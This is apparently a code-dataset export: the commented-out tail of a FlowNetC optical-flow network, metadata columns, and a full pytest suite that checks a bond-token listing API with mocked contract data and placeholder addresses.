# pad_size=20,
# kernel_size=1,
# max_displacement=20,
# stride1=1,
# stride2=2,
# corr_multiply=1,
# )
# # self.corr_activation = nn.LeakyReLU(0.1, inplace=True)
# self.corr_activation = nn.ReLU(inplace=True)
# self.conv3_1 = conv(self.batchNorm, 473, 256)
# self.conv4 = conv(self.batchNorm, 256, 512, stride=2)
# self.conv4_1 = conv(self.batchNorm, 512, 512)
# self.conv5 = conv(self.batchNorm, 512, 512, stride=2)
# self.conv5_1 = conv(self.batchNorm, 512, 512)
# self.conv6 = conv(self.batchNorm, 512, 1024, stride=2)
# self.conv6_1 = conv(self.batchNorm, 1024, 1024)
# self.deconv5 = deconv(1024, 512)
# self.deconv4 = deconv(1026, 256)
# self.deconv3 = deconv(770, 128)
# self.deconv2 = deconv(386, 64)
# self.predict_flow6 = predict_flow(1024)
# self.predict_flow5 = predict_flow(1026)
# self.predict_flow4 = predict_flow(770)
# self.predict_flow3 = predict_flow(386)
# self.predict_flow2 = predict_flow(194)
# self.upsampled_flow6_to_5 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=True)
# self.upsampled_flow5_to_4 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=True)
# self.upsampled_flow4_to_3 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=True)
# self.upsampled_flow3_to_2 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=True)
# for m in self.modules():
# if isinstance(m, nn.Conv2d):
# if m.bias is not None:
# init.uniform_(m.bias)
# init.xavier_uniform_(m.weight)
# if isinstance(m, nn.ConvTranspose2d):
# if m.bias is not None:
# init.uniform_(m.bias)
# init.xavier_uniform_(m.weight)
# # init_deconv_bilinear(m.weight)
# self.upsample1 = nn.Upsample(scale_factor=4, mode="bilinear")
# def forward(self, x):
# x1 = x[:, 0:1, :, :]
# x2 = x[:, 1::, :, :]
# out_conv1a = self.conv1(x1)
# out_conv2a = self.conv2(out_conv1a)
# out_conv3a = self.conv3(out_conv2a)
# # FlownetC bottom input stream
# out_conv1b = self.conv1(x2)
# out_conv2b = self.conv2(out_conv1b)
# out_conv3b = self.conv3(out_conv2b)
# # Merge streams
# out_corr = self.corr(out_conv3a, out_conv3b) # False
# out_corr = self.corr_activation(out_corr)
# # Redirect top input stream and concatenate
# out_conv_redir = self.conv_redir(out_conv3a)
# in_conv3_1 = torch.cat((out_conv_redir, out_corr), 1)
# # Merged conv layers
# out_conv3_1 = self.conv3_1(in_conv3_1)
# out_conv4 = self.conv4_1(self.conv4(out_conv3_1))
# out_conv5 = self.conv5_1(self.conv5(out_conv4))
# out_conv6 = self.conv6_1(self.conv6(out_conv5))
# flow6 = self.predict_flow6(out_conv6)
# flow6_up = self.upsampled_flow6_to_5(flow6)
# out_deconv5 = self.deconv5(out_conv6)
# concat5 = torch.cat((out_conv5, out_deconv5, flow6_up), 1)
# flow5 = self.predict_flow5(concat5)
# flow5_up = self.upsampled_flow5_to_4(flow5)
# out_deconv4 = self.deconv4(concat5)
# concat4 = torch.cat((out_conv4, out_deconv4, flow5_up), 1)
# flow4 = self.predict_flow4(concat4)
# flow4_up = self.upsampled_flow4_to_3(flow4)
# out_deconv3 = self.deconv3(concat4)
# concat3 = torch.cat((out_conv3_1, out_deconv3, flow4_up), 1)
# flow3 = self.predict_flow3(concat3)
# flow3_up = self.upsampled_flow3_to_2(flow3)
# out_deconv2 = self.deconv2(concat3)
# concat2 = torch.cat((out_conv2a, out_deconv2, flow3_up), 1)
# flow2 = self.predict_flow2(concat2)
# return flow2, concat2, out_conv1a, flow3, flow4, flow5, flow6
| 38.915842
| 85
| 0.622567
| 2,136
| 15,722
| 4.344569
| 0.080524
| 0.053233
| 0.060453
| 0.032759
| 0.871121
| 0.858405
| 0.856466
| 0.843966
| 0.82306
| 0.80625
| 0
| 0.094943
| 0.261735
| 15,722
| 403
| 86
| 39.012407
| 0.704575
| 0.303142
| 0
| 0.827751
| 0
| 0
| 0.005256
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047847
| false
| 0
| 0.038278
| 0.019139
| 0.148325
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3e7242c68c16813170d82309e047333d3745e304
| 30,720
|
py
|
Python
|
tests/test_app_routers_bond_tokens_GET.py
|
BoostryJP/ibet-Prime
|
924e7f8da4f8feea0a572e8b5532e09bcdf2dc99
|
[
"Apache-2.0"
] | 2
|
2021-08-19T12:35:25.000Z
|
2022-02-16T04:13:38.000Z
|
tests/test_app_routers_bond_tokens_GET.py
|
BoostryJP/ibet-Prime
|
924e7f8da4f8feea0a572e8b5532e09bcdf2dc99
|
[
"Apache-2.0"
] | 46
|
2021-09-02T03:22:05.000Z
|
2022-03-31T09:20:00.000Z
|
tests/test_app_routers_bond_tokens_GET.py
|
BoostryJP/ibet-Prime
|
924e7f8da4f8feea0a572e8b5532e09bcdf2dc99
|
[
"Apache-2.0"
] | 1
|
2021-11-17T23:18:27.000Z
|
2021-11-17T23:18:27.000Z
|
"""
Copyright BOOSTRY Co., Ltd.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
SPDX-License-Identifier: Apache-2.0
"""
import pytz
from unittest import mock
from unittest.mock import call
from app.model.blockchain import IbetStraightBondContract
from app.model.db import (
Token,
TokenType,
AdditionalTokenInfo
)
from config import TZ
from tests.account_config import config_eth_account
class TestAppRoutersBondTokensGET:
# target API endpoint
apiurl = "/bond/tokens"
local_tz = pytz.timezone(TZ)
###########################################################################
# Normal Case
###########################################################################
# <Normal Case 1>
# parameter unset address, 0 Record
def test_normal_1(self, client, db):
resp = client.get(self.apiurl)
assert resp.status_code == 200
assert resp.json() == []
# <Normal Case 2>
# parameter unset address, 1 Record
@mock.patch("app.model.blockchain.token.IbetStraightBondContract.get")
def test_normal_2(self, mock_get, client, db):
user_1 = config_eth_account("user1")
issuer_address_1 = user_1["address"]
token = Token()
token.type = TokenType.IBET_STRAIGHT_BOND
token.tx_hash = "tx_hash_test1"
token.issuer_address = issuer_address_1
token.token_address = "token_address_test1"
token.abi = "abi_test1"
db.add(token)
db.commit()
_issue_datetime = pytz.timezone("UTC").localize(token.created).astimezone(self.local_tz).isoformat()
mock_token = IbetStraightBondContract()
mock_token.issuer_address = token.issuer_address
mock_token.token_address = token.token_address
mock_token.name = "testtoken1"
mock_token.symbol = "test1"
mock_token.total_supply = 10000
mock_token.contact_information = "contactInformation_test1"
mock_token.privacy_policy = "privacyPolicy_test1"
mock_token.tradable_exchange_contract_address = "0x1234567890abCdFe1234567890ABCdFE12345678"
mock_token.status = True
mock_token.face_value = 200
mock_token.redemption_date = "redemptionDate_test1"
mock_token.redemption_value = 40
mock_token.return_date = "returnDate_test1"
mock_token.return_amount = "returnAmount_test1"
mock_token.purpose = "purpose_test1"
mock_token.interest_rate = 0.003
mock_token.transferable = True
mock_token.is_offering = False
mock_token.is_redeemed = False
mock_token.personal_info_contract_address = "0x1234567890aBcDFE1234567890abcDFE12345679"
mock_token.interest_payment_date = [
"interestPaymentDate1_test1", "interestPaymentDate2_test1",
"interestPaymentDate3_test1", "interestPaymentDate4_test1",
"interestPaymentDate5_test1", "interestPaymentDate6_test1",
"interestPaymentDate7_test1", "interestPaymentDate8_test1",
"interestPaymentDate9_test1", "interestPaymentDate10_test1",
"interestPaymentDate11_test1", "interestPaymentDate12_test1",
]
mock_token.transfer_approval_required = True
mock_token.memo = "memo_test1"
mock_get.side_effect = [
mock_token
]
resp = client.get(self.apiurl)
# assertion mock call arguments
mock_get.assert_any_call(contract_address=token.token_address)
assumed_response = [
{
"issuer_address": token.issuer_address,
"token_address": token.token_address,
"name": "testtoken1",
"symbol": "test1",
"total_supply": 10000,
"contact_information": "contactInformation_test1",
"privacy_policy": "privacyPolicy_test1",
"tradable_exchange_contract_address": "0x1234567890abCdFe1234567890ABCdFE12345678",
"status": True,
"face_value": 200,
"redemption_date": "redemptionDate_test1",
"redemption_value": 40,
"return_date": "returnDate_test1",
"return_amount": "returnAmount_test1",
"purpose": "purpose_test1",
"interest_rate": 0.003,
"transferable": True,
"is_offering": False,
"is_redeemed": False,
"personal_info_contract_address": "0x1234567890aBcDFE1234567890abcDFE12345679",
"interest_payment_date": [
"interestPaymentDate1_test1", "interestPaymentDate2_test1",
"interestPaymentDate3_test1", "interestPaymentDate4_test1",
"interestPaymentDate5_test1", "interestPaymentDate6_test1",
"interestPaymentDate7_test1", "interestPaymentDate8_test1",
"interestPaymentDate9_test1", "interestPaymentDate10_test1",
"interestPaymentDate11_test1", "interestPaymentDate12_test1",
],
"issue_datetime": _issue_datetime,
"token_status": 1,
"transfer_approval_required": True,
"is_manual_transfer_approval": False,
"memo": "memo_test1",
},
]
assert resp.status_code == 200
assert resp.json() == assumed_response
# <Normal Case 3>
# parameter unset address, Multi Record
@mock.patch("app.model.blockchain.token.IbetStraightBondContract.get")
def test_normal_3(self, mock_get, client, db):
user_1 = config_eth_account("user1")
issuer_address_1 = user_1["address"]
user_2 = config_eth_account("user2")
issuer_address_2 = user_2["address"]
# 1st Data
token_1 = Token()
token_1.type = TokenType.IBET_STRAIGHT_BOND
token_1.tx_hash = "tx_hash_test1"
token_1.issuer_address = issuer_address_1
token_1.token_address = "token_address_test1"
token_1.abi = "abi_test1"
db.add(token_1)
db.commit()
_issue_datetime_1 = pytz.timezone("UTC").localize(token_1.created).astimezone(self.local_tz).isoformat()
additional_info_1 = AdditionalTokenInfo()
additional_info_1.token_address = "token_address_test1"
additional_info_1.is_manual_transfer_approval = True
db.add(additional_info_1)
db.commit()
mock_token_1 = IbetStraightBondContract()
mock_token_1.issuer_address = token_1.issuer_address
mock_token_1.token_address = token_1.token_address
mock_token_1.name = "testtoken1"
mock_token_1.symbol = "test1"
mock_token_1.total_supply = 10000
mock_token_1.contact_information = "contactInformation_test1"
mock_token_1.privacy_policy = "privacyPolicy_test1"
mock_token_1.tradable_exchange_contract_address = "0x1234567890abCdFe1234567890ABCdFE12345678"
mock_token_1.status = True
mock_token_1.face_value = 200
mock_token_1.redemption_date = "redemptionDate_test1"
mock_token_1.redemption_value = 40
mock_token_1.return_date = "returnDate_test1"
mock_token_1.return_amount = "returnAmount_test1"
mock_token_1.purpose = "purpose_test1"
mock_token_1.interest_rate = 0.003
mock_token_1.transferable = True
mock_token_1.is_offering = False
mock_token_1.is_redeemed = False
mock_token_1.personal_info_contract_address = "0x1234567890aBcDFE1234567890abcDFE12345679"
mock_token_1.interest_payment_date = [
"interestPaymentDate1_test1", "interestPaymentDate2_test1",
"interestPaymentDate3_test1", "interestPaymentDate4_test1",
"interestPaymentDate5_test1", "interestPaymentDate6_test1",
"interestPaymentDate7_test1", "interestPaymentDate8_test1",
"interestPaymentDate9_test1", "interestPaymentDate10_test1",
"interestPaymentDate11_test1", "interestPaymentDate12_test1",
]
mock_token_1.transfer_approval_required = True
mock_token_1.memo = "memo_test1"
# 2nd Data
token_2 = Token()
token_2.type = TokenType.IBET_STRAIGHT_BOND
token_2.tx_hash = "tx_hash_test2"
token_2.issuer_address = issuer_address_2
token_2.token_address = "token_address_test2"
token_2.abi = "abi_test2"
token_2.token_status = 0
db.add(token_2)
db.commit()
_issue_datetime_2 = pytz.timezone("UTC").localize(token_2.created).astimezone(self.local_tz).isoformat()
additional_info_2 = AdditionalTokenInfo()
additional_info_2.token_address = "token_address_test2"
additional_info_2.is_manual_transfer_approval = None # not target
db.add(additional_info_2)
db.commit()
mock_token_2 = IbetStraightBondContract()
mock_token_2.issuer_address = token_2.issuer_address
mock_token_2.token_address = token_2.token_address
mock_token_2.name = "testtoken2"
mock_token_2.symbol = "test2"
mock_token_2.total_supply = 50000
mock_token_2.contact_information = "contactInformation_test2"
mock_token_2.privacy_policy = "privacyPolicy_test2"
mock_token_2.tradable_exchange_contract_address = "0x1234567890AbcdfE1234567890abcdfE12345680"
mock_token_2.status = True
mock_token_2.face_value = 600
mock_token_2.redemption_date = "redemptionDate_test2"
mock_token_2.redemption_value = 80
mock_token_2.return_date = "returnDate_test2"
mock_token_2.return_amount = "returnAmount_test2"
mock_token_2.purpose = "purpose_test2"
mock_token_2.interest_rate = 0.007
mock_token_2.transferable = False
mock_token_2.is_offering = False
mock_token_2.is_redeemed = False
mock_token_2.personal_info_contract_address = "0x1234567890abcdFE1234567890ABcdfE12345681"
mock_token_2.interest_payment_date = [
"interestPaymentDate1_test2", "interestPaymentDate2_test2",
"interestPaymentDate3_test2", "interestPaymentDate4_test2",
"interestPaymentDate5_test2", "interestPaymentDate6_test2",
"interestPaymentDate7_test2", "interestPaymentDate8_test2",
"interestPaymentDate9_test2", "interestPaymentDate10_test2",
"interestPaymentDate11_test2", "interestPaymentDate12_test2",
]
mock_token_2.transfer_approval_required = False
mock_token_2.memo = "memo_test2"
mock_get.side_effect = [
mock_token_1, mock_token_2
]
resp = client.get(self.apiurl)
# assertion mock call arguments
mock_get.assert_has_calls(
[call(contract_address=token_1.token_address), call(contract_address=token_2.token_address)])
assumed_response = [
{
"issuer_address": token_1.issuer_address,
"token_address": token_1.token_address,
"name": "testtoken1",
"symbol": "test1",
"total_supply": 10000,
"contact_information": "contactInformation_test1",
"privacy_policy": "privacyPolicy_test1",
"tradable_exchange_contract_address": "0x1234567890abCdFe1234567890ABCdFE12345678",
"status": True,
"face_value": 200,
"redemption_date": "redemptionDate_test1",
"redemption_value": 40,
"return_date": "returnDate_test1",
"return_amount": "returnAmount_test1",
"purpose": "purpose_test1",
"interest_rate": 0.003,
"transferable": True,
"is_offering": False,
"is_redeemed": False,
"personal_info_contract_address": "0x1234567890aBcDFE1234567890abcDFE12345679",
"interest_payment_date": [
"interestPaymentDate1_test1", "interestPaymentDate2_test1",
"interestPaymentDate3_test1", "interestPaymentDate4_test1",
"interestPaymentDate5_test1", "interestPaymentDate6_test1",
"interestPaymentDate7_test1", "interestPaymentDate8_test1",
"interestPaymentDate9_test1", "interestPaymentDate10_test1",
"interestPaymentDate11_test1", "interestPaymentDate12_test1",
],
"issue_datetime": _issue_datetime_1,
"token_status": 1,
"transfer_approval_required": True,
"is_manual_transfer_approval": True,
"memo": "memo_test1",
},
{
"issuer_address": token_2.issuer_address,
"token_address": token_2.token_address,
"name": "testtoken2",
"symbol": "test2",
"total_supply": 50000,
"contact_information": "contactInformation_test2",
"privacy_policy": "privacyPolicy_test2",
"tradable_exchange_contract_address": "0x1234567890AbcdfE1234567890abcdfE12345680",
"status": True,
"face_value": 600,
"redemption_date": "redemptionDate_test2",
"redemption_value": 80,
"return_date": "returnDate_test2",
"return_amount": "returnAmount_test2",
"purpose": "purpose_test2",
"interest_rate": 0.007,
"transferable": False,
"is_offering": False,
"is_redeemed": False,
"personal_info_contract_address": "0x1234567890abcdFE1234567890ABcdfE12345681",
"interest_payment_date": [
"interestPaymentDate1_test2", "interestPaymentDate2_test2",
"interestPaymentDate3_test2", "interestPaymentDate4_test2",
"interestPaymentDate5_test2", "interestPaymentDate6_test2",
"interestPaymentDate7_test2", "interestPaymentDate8_test2",
"interestPaymentDate9_test2", "interestPaymentDate10_test2",
"interestPaymentDate11_test2", "interestPaymentDate12_test2",
],
"issue_datetime": _issue_datetime_2,
"token_status": 0,
"transfer_approval_required": False,
"is_manual_transfer_approval": False,
"memo": "memo_test2",
},
]
assert resp.status_code == 200
assert resp.json() == assumed_response
# <Normal Case 4>
# parameter set address, 0 Record
def test_normal_4(self, client, db):
user_1 = config_eth_account("user1")
issuer_address_1 = user_1["address"]
user_2 = config_eth_account("user2")
issuer_address_2 = user_2["address"]
# No Target Data
token = Token()
token.type = TokenType.IBET_STRAIGHT_BOND
token.tx_hash = "tx_hash_test1"
token.issuer_address = issuer_address_1
token.token_address = "token_address_test1"
token.abi = "abi_test1"
db.add(token)
resp = client.get(self.apiurl, headers={"issuer-address": issuer_address_2})
assert resp.status_code == 200
assert resp.json() == []
# <Normal Case 5>
# parameter set address, 1 Record
@mock.patch("app.model.blockchain.token.IbetStraightBondContract.get")
def test_normal_5(self, mock_get, client, db):
user_1 = config_eth_account("user1")
issuer_address_1 = user_1["address"]
user_2 = config_eth_account("user2")
issuer_address_2 = user_2["address"]
token_1 = Token()
token_1.type = TokenType.IBET_STRAIGHT_BOND
token_1.tx_hash = "tx_hash_test1"
token_1.issuer_address = issuer_address_1
token_1.token_address = "token_address_test1"
token_1.abi = "abi_test1"
db.add(token_1)
db.commit()
_issue_datetime = pytz.timezone("UTC").localize(token_1.created).astimezone(self.local_tz).isoformat()
mock_token = IbetStraightBondContract()
mock_token.issuer_address = token_1.issuer_address
mock_token.token_address = token_1.token_address
mock_token.name = "testtoken1"
mock_token.symbol = "test1"
mock_token.total_supply = 10000
mock_token.contact_information = "contactInformation_test1"
mock_token.privacy_policy = "privacyPolicy_test1"
mock_token.tradable_exchange_contract_address = "0x1234567890abCdFe1234567890ABCdFE12345678"
mock_token.status = True
mock_token.face_value = 200
mock_token.redemption_date = "redemptionDate_test1"
mock_token.redemption_value = 40
mock_token.return_date = "returnDate_test1"
mock_token.return_amount = "returnAmount_test1"
mock_token.purpose = "purpose_test1"
mock_token.interest_rate = 0.003
mock_token.transferable = True
mock_token.is_offering = False
mock_token.is_redeemed = False
mock_token.personal_info_contract_address = "0x1234567890aBcDFE1234567890abcDFE12345679"
mock_token.interest_payment_date = [
"interestPaymentDate1_test1", "interestPaymentDate2_test1",
"interestPaymentDate3_test1", "interestPaymentDate4_test1",
"interestPaymentDate5_test1", "interestPaymentDate6_test1",
"interestPaymentDate7_test1", "interestPaymentDate8_test1",
"interestPaymentDate9_test1", "interestPaymentDate10_test1",
"interestPaymentDate11_test1", "interestPaymentDate12_test1",
]
mock_token.transfer_approval_required = True
mock_token.memo = "memo_test1"
mock_get.side_effect = [
mock_token
]
# No Target Data
token_2 = Token()
token_2.type = TokenType.IBET_STRAIGHT_BOND
token_2.tx_hash = "tx_hash_test1"
token_2.issuer_address = issuer_address_2
token_2.token_address = "token_address_test1"
token_2.abi = "abi_test1"
db.add(token_2)
resp = client.get(self.apiurl, headers={"issuer-address": issuer_address_1})
# assertion mock call arguments
mock_get.assert_any_call(contract_address=token_1.token_address)
assumed_response = [
{
"issuer_address": token_1.issuer_address,
"token_address": token_1.token_address,
"name": "testtoken1",
"symbol": "test1",
"total_supply": 10000,
"contact_information": "contactInformation_test1",
"privacy_policy": "privacyPolicy_test1",
"tradable_exchange_contract_address": "0x1234567890abCdFe1234567890ABCdFE12345678",
"status": True,
"face_value": 200,
"redemption_date": "redemptionDate_test1",
"redemption_value": 40,
"return_date": "returnDate_test1",
"return_amount": "returnAmount_test1",
"purpose": "purpose_test1",
"interest_rate": 0.003,
"transferable": True,
"is_offering": False,
"is_redeemed": False,
"personal_info_contract_address": "0x1234567890aBcDFE1234567890abcDFE12345679",
"interest_payment_date": [
"interestPaymentDate1_test1", "interestPaymentDate2_test1",
"interestPaymentDate3_test1", "interestPaymentDate4_test1",
"interestPaymentDate5_test1", "interestPaymentDate6_test1",
"interestPaymentDate7_test1", "interestPaymentDate8_test1",
"interestPaymentDate9_test1", "interestPaymentDate10_test1",
"interestPaymentDate11_test1", "interestPaymentDate12_test1",
],
"issue_datetime": _issue_datetime,
"token_status": 1,
"transfer_approval_required": True,
"is_manual_transfer_approval": False,
"memo": "memo_test1",
},
]
assert resp.status_code == 200
assert resp.json() == assumed_response
# <Normal Case 6>
# parameter set address, Multi Record
@mock.patch("app.model.blockchain.token.IbetStraightBondContract.get")
def test_normal_6(self, mock_get, client, db):
user_1 = config_eth_account("user1")
issuer_address_1 = user_1["address"]
user_2 = config_eth_account("user2")
issuer_address_2 = user_2["address"]
# 1st Data
token_1 = Token()
token_1.type = TokenType.IBET_STRAIGHT_BOND
token_1.tx_hash = "tx_hash_test1"
token_1.issuer_address = issuer_address_1
token_1.token_address = "token_address_test1"
token_1.abi = "abi_test1"
db.add(token_1)
db.commit()
_issue_datetime_1 = pytz.timezone("UTC").localize(token_1.created).astimezone(self.local_tz).isoformat()
mock_token_1 = IbetStraightBondContract()
mock_token_1.issuer_address = token_1.issuer_address
mock_token_1.token_address = token_1.token_address
mock_token_1.name = "testtoken1"
mock_token_1.symbol = "test1"
mock_token_1.total_supply = 10000
mock_token_1.contact_information = "contactInformation_test1"
mock_token_1.privacy_policy = "privacyPolicy_test1"
mock_token_1.tradable_exchange_contract_address = "0x1234567890abCdFe1234567890ABCdFE12345678"
mock_token_1.status = True
mock_token_1.face_value = 200
mock_token_1.redemption_date = "redemptionDate_test1"
mock_token_1.redemption_value = 40
mock_token_1.return_date = "returnDate_test1"
mock_token_1.return_amount = "returnAmount_test1"
mock_token_1.purpose = "purpose_test1"
mock_token_1.interest_rate = 0.003
mock_token_1.transferable = True
mock_token_1.is_offering = False
mock_token_1.is_redeemed = False
mock_token_1.personal_info_contract_address = "0x1234567890aBcDFE1234567890abcDFE12345679"
mock_token_1.interest_payment_date = [
"interestPaymentDate1_test1", "interestPaymentDate2_test1",
"interestPaymentDate3_test1", "interestPaymentDate4_test1",
"interestPaymentDate5_test1", "interestPaymentDate6_test1",
"interestPaymentDate7_test1", "interestPaymentDate8_test1",
"interestPaymentDate9_test1", "interestPaymentDate10_test1",
"interestPaymentDate11_test1", "interestPaymentDate12_test1",
]
mock_token_1.transfer_approval_required = True
mock_token_1.memo = "memo_test1"
# 2nd Data
token_2 = Token()
token_2.type = TokenType.IBET_STRAIGHT_BOND
token_2.tx_hash = "tx_hash_test2"
token_2.issuer_address = issuer_address_1
token_2.token_address = "token_address_test2"
token_2.abi = "abi_test2"
token_2.token_status = 0
db.add(token_2)
db.commit()
_issue_datetime_2 = pytz.timezone("UTC").localize(token_2.created).astimezone(self.local_tz).isoformat()
mock_token_2 = IbetStraightBondContract()
mock_token_2.issuer_address = token_2.issuer_address
mock_token_2.token_address = token_2.token_address
mock_token_2.name = "testtoken2"
mock_token_2.symbol = "test2"
mock_token_2.total_supply = 50000
mock_token_2.contact_information = "contactInformation_test2"
mock_token_2.privacy_policy = "privacyPolicy_test2"
mock_token_2.tradable_exchange_contract_address = "0x1234567890AbcdfE1234567890abcdfE12345680"
mock_token_2.status = True
mock_token_2.face_value = 600
mock_token_2.redemption_date = "redemptionDate_test2"
mock_token_2.redemption_value = 80
mock_token_2.return_date = "returnDate_test2"
mock_token_2.return_amount = "returnAmount_test2"
mock_token_2.purpose = "purpose_test2"
mock_token_2.interest_rate = 0.007
mock_token_2.transferable = False
mock_token_2.is_offering = False
mock_token_2.is_redeemed = False
mock_token_2.personal_info_contract_address = "0x1234567890abcdFE1234567890ABcdfE12345681"
mock_token_2.interest_payment_date = [
"interestPaymentDate1_test2", "interestPaymentDate2_test2",
"interestPaymentDate3_test2", "interestPaymentDate4_test2",
"interestPaymentDate5_test2", "interestPaymentDate6_test2",
"interestPaymentDate7_test2", "interestPaymentDate8_test2",
"interestPaymentDate9_test2", "interestPaymentDate10_test2",
"interestPaymentDate11_test2", "interestPaymentDate12_test2",
]
mock_token_2.transfer_approval_required = False
mock_token_2.memo = "memo_test2"
mock_get.side_effect = [
mock_token_1, mock_token_2
]
# No Target Data
token_3 = Token()
token_3.type = TokenType.IBET_STRAIGHT_BOND
token_3.tx_hash = "tx_hash_test1"
token_3.issuer_address = issuer_address_2
token_3.token_address = "token_address_test1"
token_3.abi = "abi_test1"
db.add(token_3)
resp = client.get(self.apiurl, headers={"issuer-address": issuer_address_1})
# assertion mock call arguments
mock_get.assert_has_calls(
[call(contract_address=token_1.token_address), call(contract_address=token_2.token_address)])
assumed_response = [
{
"issuer_address": issuer_address_1,
"token_address": token_1.token_address,
"name": "testtoken1",
"symbol": "test1",
"total_supply": 10000,
"contact_information": "contactInformation_test1",
"privacy_policy": "privacyPolicy_test1",
"tradable_exchange_contract_address": "0x1234567890abCdFe1234567890ABCdFE12345678",
"status": True,
"face_value": 200,
"redemption_date": "redemptionDate_test1",
"redemption_value": 40,
"return_date": "returnDate_test1",
"return_amount": "returnAmount_test1",
"purpose": "purpose_test1",
"interest_rate": 0.003,
"transferable": True,
"is_offering": False,
"is_redeemed": False,
"personal_info_contract_address": "0x1234567890aBcDFE1234567890abcDFE12345679",
"interest_payment_date": [
"interestPaymentDate1_test1", "interestPaymentDate2_test1",
"interestPaymentDate3_test1", "interestPaymentDate4_test1",
"interestPaymentDate5_test1", "interestPaymentDate6_test1",
"interestPaymentDate7_test1", "interestPaymentDate8_test1",
"interestPaymentDate9_test1", "interestPaymentDate10_test1",
"interestPaymentDate11_test1", "interestPaymentDate12_test1",
],
"issue_datetime": _issue_datetime_1,
"token_status": 1,
"transfer_approval_required": True,
"is_manual_transfer_approval": False,
"memo": "memo_test1",
},
{
"issuer_address": issuer_address_1,
"token_address": token_2.token_address,
"name": "testtoken2",
"symbol": "test2",
"total_supply": 50000,
"contact_information": "contactInformation_test2",
"privacy_policy": "privacyPolicy_test2",
"tradable_exchange_contract_address": "0x1234567890AbcdfE1234567890abcdfE12345680",
"status": True,
"face_value": 600,
"redemption_date": "redemptionDate_test2",
"redemption_value": 80,
"return_date": "returnDate_test2",
"return_amount": "returnAmount_test2",
"purpose": "purpose_test2",
"interest_rate": 0.007,
"transferable": False,
"is_offering": False,
"is_redeemed": False,
"personal_info_contract_address": "0x1234567890abcdFE1234567890ABcdfE12345681",
"interest_payment_date": [
"interestPaymentDate1_test2", "interestPaymentDate2_test2",
"interestPaymentDate3_test2", "interestPaymentDate4_test2",
"interestPaymentDate5_test2", "interestPaymentDate6_test2",
"interestPaymentDate7_test2", "interestPaymentDate8_test2",
"interestPaymentDate9_test2", "interestPaymentDate10_test2",
"interestPaymentDate11_test2", "interestPaymentDate12_test2",
],
"issue_datetime": _issue_datetime_2,
"token_status": 0,
"transfer_approval_required": False,
"is_manual_transfer_approval": False,
"memo": "memo_test2",
},
]
assert resp.status_code == 200
assert resp.json() == assumed_response
###########################################################################
# Error Case
###########################################################################
# <Error_1>
# parameter error
def test_error_1(self, client, db):
resp = client.get(self.apiurl, headers={"issuer-address": "issuer_address"})
assert resp.status_code == 422
assert resp.json() == {
"meta": {
"code": 1,
"title": "RequestValidationError"
},
"detail": [{
"loc": ["header", "issuer-address"],
"msg": "issuer-address is not a valid address",
"type": "value_error"
}]
}
| 44.716157
| 112
| 0.633333
| 2,917
| 30,720
| 6.259513
| 0.07782
| 0.073936
| 0.027384
| 0.013144
| 0.927378
| 0.923216
| 0.905636
| 0.900652
| 0.894627
| 0.88926
| 0
| 0.0729
| 0.273047
| 30,720
| 686
| 113
| 44.781341
| 0.744716
| 0.038086
| 0
| 0.842196
| 0
| 0
| 0.32902
| 0.210379
| 0
| 0
| 0.034504
| 0
| 0.030875
| 1
| 0.012007
| false
| 0
| 0.012007
| 0
| 0.02916
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3e842bee8dca1ee70ccb3b6cc5b787670e3c9dda
| 144
|
py
|
Python
|
giza/tests/test_giza.py
|
cehbrecht/quick-sphinx-tutorial
|
6a855e3d1c5d072951bf775bdfdf85388eba5df8
|
[
"Apache-2.0"
] | 2
|
2016-04-20T22:03:57.000Z
|
2016-06-14T18:54:54.000Z
|
giza/tests/test_giza.py
|
cehbrecht/quick-sphinx-tutorial
|
6a855e3d1c5d072951bf775bdfdf85388eba5df8
|
[
"Apache-2.0"
] | null | null | null |
giza/tests/test_giza.py
|
cehbrecht/quick-sphinx-tutorial
|
6a855e3d1c5d072951bf775bdfdf85388eba5df8
|
[
"Apache-2.0"
] | 11
|
2018-02-01T23:42:12.000Z
|
2021-04-28T04:02:29.000Z
|
from giza import calc_square
def test_calc_square():
assert calc_square(2, verbosity=0) == 4
assert calc_square(4, verbosity=1) == 16
| 24
| 44
| 0.715278
| 23
| 144
| 4.26087
| 0.608696
| 0.408163
| 0.326531
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059322
| 0.180556
| 144
| 5
| 45
| 28.8
| 0.771186
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
903cc5e695d6564223090266b16341d9860cc5b6
| 29,537
|
py
|
Python
|
tradenity/resources/store_credit.py
|
tradenity/python-sdk
|
d13fbe23f4d6ff22554c6d8d2deaf209371adaf1
|
[
"Apache-2.0"
] | 1
|
2020-03-19T04:09:17.000Z
|
2020-03-19T04:09:17.000Z
|
tradenity/resources/store_credit.py
|
tradenity/python-sdk
|
d13fbe23f4d6ff22554c6d8d2deaf209371adaf1
|
[
"Apache-2.0"
] | null | null | null |
tradenity/resources/store_credit.py
|
